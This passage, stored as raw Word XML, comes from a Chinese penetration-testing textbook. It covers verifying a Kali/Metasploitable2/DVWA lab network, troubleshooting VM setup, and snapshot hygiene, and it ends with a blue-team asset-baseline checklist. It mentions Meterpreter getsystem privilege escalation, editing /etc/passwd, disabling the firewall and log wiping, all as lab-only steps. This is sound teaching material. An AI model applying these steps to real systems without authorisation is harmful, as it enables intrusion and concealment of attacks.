        <w:t xml:space="preserve">检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务是否响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出中应出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自身</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;KALI_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，状态为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host is up (0.000xxs latency)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">丢包率为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0%，延迟在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">毫秒以内（因为是虚拟网络）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若上述现象出现，说明实验室网络层已就绪，可进行后续章节的渗透测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错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故障现象</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">可能原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">解决方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">靶机无法获取</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">靶机网络适配器未设为</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Host-Only，或</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Host-Only DHCP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务未启动</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">检查</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> VirtualBox </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">全局设置</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">网络</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> → Host-Only </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Networks，确保</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DHCP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务器启用；检查靶机</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> VM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">设置中的网卡模式。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kali </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">无法</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ping </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">通靶机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">双方不在同一</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> vboxnet </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">网段，或靶机防火墙拦截</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">确认两台</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> VM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">均绑定了同一</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Host-Only </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">网络；在靶机上临时关闭防火墙（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo ufw disable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">，仅限实验环境）测试。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">靶机启动后直接进入</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> GRUB (Metasploitable2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">镜像解压路径含中文字符或磁盘控制器类型不匹配</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">将文件移至纯英文路径；尝试修改</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> VM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">控制器为</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IDE。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">镜像导入失败（OVA</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">错误）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">下载不完整或</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> OVA </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">格式损坏</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">验证文件哈希；重新下载；或尝试用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">VBoxManage import</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">命令行导入。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DVWA </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">页面显示空白或数据库连接错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PHP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">模块缺失或数据库未正确配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">检查</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Apache </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">错误日志，确认</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">php-mysqli</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等安装；编辑</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">config.inc.php</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">配置正确的数据库凭据。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">破坏性操作风险标注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行任何可能破坏系统文件的操作（如利用漏洞删除文件、修改配置）前，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">必须</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">先为靶机保存快照（见下文）。没有快照保护的破坏性操作可能导致靶机不可用，需重新部署。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="53" w:name="快照保存最关键的实验卫生习惯"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">快照保存：最关键的实验卫生习惯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">快照是实验教学的「保存点」与「后悔药」</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。在首次启动靶机、确认网络连通性正常后，应立即创建一份「</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">初始干净状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">」快照。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令（VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GUI）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选中靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VM → 「Machine」→ 「Take </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Snapshot」。命名清晰如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基线-初始部署-即刻保存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。此后，每次进行高风险操作（提权、编写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit、修改系统文件）前，再额外保存一个增量快照，或直接回滚至基线快照。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">高风险操作标识</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下操作建议在执行前先保存快照：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成功获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话后执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或注册表；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行清理痕迹（删除日志）的操作——为确保实验可重复，一般应保留攻击痕迹供蓝队分析，若需清理也应基于快照回滚而非手动擦除。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御视角的快照价值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御者可以利用同一套快照机制，在攻击结束后将系统回滚至攻击前的基线，然后挂载取证工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Sleuth Kit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，回指《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章虚拟内存概念）比较文件系统差异，从而还原攻击者的操作轨迹。这是一种低成本的「实验室内攻击回放分析」，也是蓝队入侵响应训练的有效手段。因此，保存和管理快照不仅是实验保护，也是防御练习的一部分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:id="55" w:name="防御对照框实验环境的蓝队自检"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：实验环境的蓝队自检</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虽然本节主要操作是部署实验环境，但防御者在此阶段就应建立资产清单和基线检查的思维。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">资产清点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在靶机启动后，蓝队角色应主动记录其开放端口、运行服务版本、操作系统指纹等信息（可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV &lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），建立已知资产清单。该清单即为后续攻击检测的对比基线。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
